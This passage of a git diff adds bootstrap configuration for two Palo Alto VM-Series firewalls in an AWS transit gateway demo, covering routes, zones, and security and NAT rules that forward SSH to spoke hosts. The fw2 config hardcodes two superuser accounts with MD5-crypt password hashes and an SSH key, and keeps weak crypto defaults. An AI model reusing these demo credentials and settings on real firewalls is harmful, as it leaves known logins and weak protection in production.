+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.10.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spokes">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.20.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.0.0.0/8</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>America/New_York</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>vmseries-fw1</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk=</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>vmseries-fw1</hostname>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust-zone">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust-zone">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="inbound-ssh">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>tcp-1001</member>
+                    <member>tcp-1002</member>
+                    <member>tcp-2001</member>
+                    <member>tcp-2002</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+                <entry name="spoke1-to-spoke2">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="outbound">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="deny-all">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>deny</action>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="NAT_OUT">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-1">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw1</member>
+                  </destination>
+                  <service>tcp-1001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.0.4</translated-address>
+                  </destination-translation>
+                  <to-interface>any</to-interface>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-2">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw1</member>
+                  </destination>
+                  <service>tcp-1002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.1.4</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-1">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw1</member>
+                  </destination>
+                  <service>tcp-2001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.0.4</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-2">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw1</member>
+                  </destination>
+                  <service>tcp-2002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.1.4</translated-address>
+                  </destination-translation>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <address>
+            <entry name="untrust-fw1">
+              <ip-netmask>192.168.10.4</ip-netmask>
+            </entry>
+          </address>
+          <tag>
+            <entry name="untrust-zone">
+              <color>color6</color>
+            </entry>
+            <entry name="trust-zone">
+              <color>color13</color>
+            </entry>
+          </tag>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw1/init-cfg.txt b/aws/transitgateway-demo-v2/bootstrap_files/fw1/init-cfg.txt
new file mode 100644
index 00000000..968814f6
--- /dev/null
+++ b/aws/transitgateway-demo-v2/bootstrap_files/fw1/init-cfg.txt
@@ -0,0 +1,18 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=vmseries-fw1
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=no
+dhcp-accept-server-domain=yes
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw2/authcodes b/aws/transitgateway-demo-v2/bootstrap_files/fw2/authcodes
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/aws/transitgateway-demo-v2/bootstrap_files/fw2/authcodes
@@ -0,0 +1 @@
+
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw2/bootstrap.xml b/aws/transitgateway-demo-v2/bootstrap_files/fw2/bootstrap.xml
new file mode 100644
index 00000000..32e7d2e8
--- /dev/null
+++ b/aws/transitgateway-demo-v2/bootstrap_files/fw2/bootstrap.xml
@@ -0,0 +1,821 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$gyvolqhn$qTxyak3dNrZGte6mj5znJ.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk=</public-key>
+      </entry>
+      <entry name="paloalto">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$lfqxgvff$AYLGhPFeBO8CyXTeBaqEg.</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <interface-management-profile>allow-lambda</interface-management-profile>
+              </layer3>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="allow-lambda">
+              <https>yes</https>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway/>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <nexthop>
+                      <ip-address>192.168.11.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spokes">
+                    <nexthop>
+                      <ip-address>192.168.21.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.0.0.0/8</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>America/New_York</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>vmseries-fw2</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk=</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>vmseries-fw2</hostname>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust-zone">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust-zone">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="inbound-ssh">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>tcp-1001</member>
+                    <member>tcp-1002</member>
+                    <member>tcp-2001</member>
+                    <member>tcp-2002</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+                <entry name="spoke1-to-spoke2">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="outbound">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="deny-all">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>deny</action>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="NAT_OUT">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-1">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw2</member>
+                  </destination>
+                  <service>tcp-1001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.0.4</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-2">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
